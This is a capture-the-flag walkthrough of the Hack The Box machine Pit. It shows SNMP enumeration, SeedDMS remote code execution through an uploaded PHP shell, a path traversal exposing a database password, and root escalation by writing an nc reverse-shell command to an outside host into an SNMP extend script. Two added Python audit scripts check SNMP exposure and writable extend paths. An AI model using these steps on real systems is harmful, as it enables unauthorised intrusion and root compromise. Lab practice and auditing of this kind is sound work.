OSCP PREPARATIONS – HTB Pit

Pit is a retired Linux machine; the goal is to obtain the user and root flags by exploiting its vulnerabilities.
We start with an nmap scan to get to know the target machine.
Classic Scan

Full Port Scan

The port scan shows 22/tcp (OpenSSH), 80/tcp (nginx 1.14), 9090/tcp (ssl/zeus-admin) and 161/udp (SNMP) open.
Here we encountered the hostname dms-pit.htb and added it to the hosts file.

We perform SNMP enumeration:
nmap -A -sU -p161 10.10.10.241 -Pn

snmpwalk -v2c -c public 10.10.10.241 .

/var/www/html/seeddms51x/seeddms
/usr/bin/monitor
These two paths stand out.
Since one of them sits under the web root, let's browse to it.
It redirected us to a login page.
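Before going further, it is worth seeing how much a read-only community string like public gives away. The script below is an added example, not part of the original write-up: it parses snmpwalk output of the kind produced above and reports the file-system paths, extend commands and secret-looking argument values it discloses. The walk lines are constructed for the example and are not the real output of the Pit machine.

```python
import re
from dataclasses import dataclass, field

# Constructed snmpwalk lines in the style of the enumeration above; these are
# sample values for the example, not the real output of the Pit machine.
SAMPLE_WALK = """\
SNMPv2-MIB::sysName.0 = STRING: pit.htb
HOST-RESOURCES-MIB::hrSWRunPath.1234 = STRING: "/usr/sbin/sshd"
HOST-RESOURCES-MIB::hrSWRunPath.1300 = STRING: "/usr/bin/python3"
HOST-RESOURCES-MIB::hrSWRunParameters.1300 = STRING: "/var/www/html/seeddms51x/seeddms/run.py --db-pass=s3cret"
NET-SNMP-EXTEND-MIB::nsExtendCommand."monitoring" = STRING: /usr/bin/monitor
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".1 = STRING: Monitoring /usr/local/monitoring
"""

# Objects that routinely leak file-system layout or command lines.
PATH_OBJECTS = {"hrSWRunPath", "hrSWRunParameters", "nsExtendCommand",
                "nsExtendArgs", "nsExtendOutLine"}
WALK_LINE = re.compile(
    r'^(?P<obj>[\w-]+::\w+)(?:\.(?P<idx>\S+))?\s*=\s*(?P<type>[\w-]+):\s?(?P<val>.*)$')
ABS_PATH = re.compile(r'(?<!\S)/[^\s"\']+')
SECRET_HINT = re.compile(r'(?i)(pass(word|wd)?|secret|token|api[_-]?key)\s*[=:]')


@dataclass
class WalkFindings:
    paths: set = field(default_factory=set)
    extend_commands: dict = field(default_factory=dict)
    secret_hints: list = field(default_factory=list)


def parse_walk(text):
    """Yield (object name, index, value) for every parsable snmpwalk line."""
    for raw in text.splitlines():
        m = WALK_LINE.match(raw.strip())
        if not m:
            continue
        name = m.group("obj").split("::", 1)[1]
        value = m.group("val").strip().strip('"')
        yield name, m.group("idx") or "", value


def audit_walk(text):
    """Collect disclosed paths, extend commands and secret-looking values."""
    findings = WalkFindings()
    for name, idx, value in parse_walk(text):
        if name in PATH_OBJECTS:
            findings.paths.update(ABS_PATH.findall(value))
        if name == "nsExtendCommand":
            findings.extend_commands[idx.strip('"')] = value
        if SECRET_HINT.search(value):
            findings.secret_hints.append((f"{name}.{idx}", value))
    return findings


def report(findings):
    """Render the findings as a short text report."""
    lines = [f"{len(findings.paths)} file-system path(s) disclosed:"]
    lines += [f"  {p}" for p in sorted(findings.paths)]
    for ext, cmd in findings.extend_commands.items():
        lines.append(f"extend '{ext}' runs {cmd} with snmpd's privileges "
                     "(root on many default installs)")
    for where, val in findings.secret_hints:
        lines.append(f"possible secret in {where}: {val}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(audit_walk(SAMPLE_WALK)))
```

Run it against a saved snmpwalk capture of your own hosts; every path, extend name and command-line argument it prints is visible to anyone who can reach UDP/161 with the community string. Restricting the community to known source addresses (rocommunity with a network argument) or to a limited view removes most of this exposure.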

We tried the default passwords without success. For the user michelle we then tried the username itself as the password and were able to log in.

Here we enumerate the application.

Let's check searchsploit for a known vulnerability.

There is an RCE vulnerability for this version. Let's save the payload given there as Shell.php and try to upload it as a document.

Here we see that the document id is 29. As step four of the exploit write-up describes, the uploaded file is reached at:
example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd
so we substitute 29 for document_id and request that URL.

This way we could read the passwd file. We then tried various ways of getting a shell from it without success, so we continued enumerating through this URL.

Traversing to ../../../../conf/settings.xml we find the settings.xml file,
which gives us credential information:

dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms" dbUser="seeddms" dbPass="ied^ieY6xoquu" doNotCheckVersion="false">
There was a login screen on port 9090 earlier; let's try logging in there with this username and password.

Logging in with the username seeddms failed, but with the user michelle and this password
we were, somewhat surprisingly, able to get in.

In the bottom-left menu we found the Terminal.

From here we could get the user flag but not reach the root directory, so we continue with local enumeration.

linpeas.sh gave us nothing useful, so let's look at the monitor file we saw in the snmpwalk output, /usr/bin/monitor.
When we went to look at the directory it works with, we could not list anything.
ls -ld showed why: it belongs to root and only root is authorized.

With getfacl we displayed the owner, group and access control list (ACL).

Let's see whether we can write into it:

We can write into it.
So, in place of check.sh, we make it give us a reverse shell:
echo "nc 10.10.14.157 4444 -e /bin/bash" > /usr/local/monitoring/check.sh
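The weakness exploited here is a directory that an SNMP extend script runs from and that an ordinary user may write to. The following Python audit is an added example, not part of the original write-up: it parses an snmpd.conf for extend directives, collects the absolute paths each extend program references, and reports any of those paths (or their parent directories) whose ACL grants effective write access to a principal other than root. The snmpd.conf, the program text and the getfacl output are constructed for the example; on a real host you would feed it the output of getfacl on each path.

```python
import posixpath
import re
from dataclasses import dataclass

# Constructed inputs for the example (not taken from the Pit machine): an
# snmpd.conf with one extend directive, the text of the program it runs, and
# getfacl output for the paths involved, keyed by absolute path.
SNMPD_CONF = """\
rocommunity public
extend monitoring /usr/bin/monitor
"""
SCRIPTS = {
    "/usr/bin/monitor": "#!/bin/bash\nfor f in /usr/local/monitoring/check*.sh; do bash \"$f\"; done\n",
}
ACLS = {
    "/usr/bin/monitor": "# file: usr/bin/monitor\n# owner: root\n# group: root\nuser::rwx\ngroup::r-x\nother::r-x\n",
    "/usr/bin": "# file: usr/bin\n# owner: root\n# group: root\nuser::rwx\ngroup::r-x\nother::r-x\n",
    "/usr/local/monitoring": (
        "# file: usr/local/monitoring\n# owner: root\n# group: root\n"
        "user::rwx\nuser:michelle:-wx\ngroup::r-x\nmask::rwx\nother::---\n"),
}

# extend [OID] NAME PROG [ARGS] / extend-sh NAME COMMAND
EXTEND_RE = re.compile(r'^\s*extend(?:-sh)?\s+(?:\.[\d.]+\s+)?(\S+)\s+(\S+)')
ABS_PATH = re.compile(r'(?<!\S)/[^\s"\';|&]+')


@dataclass
class AclEntry:
    kind: str   # user / group / mask / other
    name: str   # empty for the owner, the owning group and other
    perms: str  # e.g. "rwx", "-wx"


def parse_getfacl(text):
    """Parse getfacl output into (path, owner, group, entries)."""
    path = owner = group = ""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("# file:"):
            path = "/" + line.split(":", 1)[1].strip().lstrip("/")
        elif line.startswith("# owner:"):
            owner = line.split(":", 1)[1].strip()
        elif line.startswith("# group:"):
            group = line.split(":", 1)[1].strip()
        elif not line or line.startswith("#") or line.startswith("default:"):
            continue   # default ACLs only affect newly created files; out of scope here
        else:
            kind, name, perms = line.split(":", 2)
            entries.append(AclEntry(kind, name, perms))
    return path, owner, group, entries


def non_root_writers(acl_text):
    """Return (path, principals other than root with effective write access)."""
    path, owner, group, entries = parse_getfacl(acl_text)
    mask = next((e.perms for e in entries if e.kind == "mask"), "rwx")
    writers = []
    for e in entries:
        if e.kind == "mask":
            continue
        # The mask limits named users, named groups and the owning group,
        # but neither the owner nor "other".
        masked = e.kind == "group" or (e.kind == "user" and e.name)
        perms = "".join(c if c in mask else "-" for c in e.perms) if masked else e.perms
        if "w" not in perms:
            continue
        if e.kind == "other":
            writers.append("other")
        else:
            who = e.name or (owner if e.kind == "user" else group)
            if who != "root":
                writers.append(f"{e.kind}:{who}")
    return path, writers


def extend_programs(conf_text):
    """Return [(extend name, program path)] found in snmpd.conf text."""
    return [m.groups() for m in map(EXTEND_RE.match, conf_text.splitlines()) if m]


def audit_extend(conf_text, scripts, acls):
    """Flag extend programs, their directories and the absolute paths they
    reference whose ACL lets a non-root principal write."""
    findings = []
    for name, prog in extend_programs(conf_text):
        candidates = {prog, posixpath.dirname(prog)}
        for ref in ABS_PATH.findall(scripts.get(prog, "")):
            candidates.update({ref, posixpath.dirname(ref)})
        for path in sorted(candidates):
            if path not in acls:
                continue   # on a live host this would call getfacl(1) instead
            _, writers = non_root_writers(acls[path])
            if writers:
                findings.append((name, path, writers))
    return findings


if __name__ == "__main__":
    for name, path, writers in audit_extend(SNMPD_CONF, SCRIPTS, ACLS):
        print(f"extend '{name}': {path} is writable by {', '.join(writers)}")
```

The check is deliberately transitive: the extend program itself may be root-owned and read-only, as /usr/bin/monitor is in the sample, and the problem only shows up in a directory that program globs scripts from. Anything this reports should either lose the write permission or be moved out of the extend's reach, since whatever lands there runs with snmpd's privileges on the next poll.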

Then we start an nc listener and trigger the SNMP check so the script is executed:
snmpwalk -m +MY-MIB -v2c -c public 10.10.10.241 nsExtendObjects
The command now runs with root privileges,
but it gives us no output here.

Here we run into a problem: the command we wrote returns no output, and our reverse shell attempt did not connect either. So instead let's add the .pub file of a key pair created with ssh-keygen to root's .ssh folder.

Let's take this key and add it for root through the terminal.

Then we use this SSH key and get a shell.

We finally got our root flag
A difficult and challenging machine 🙂
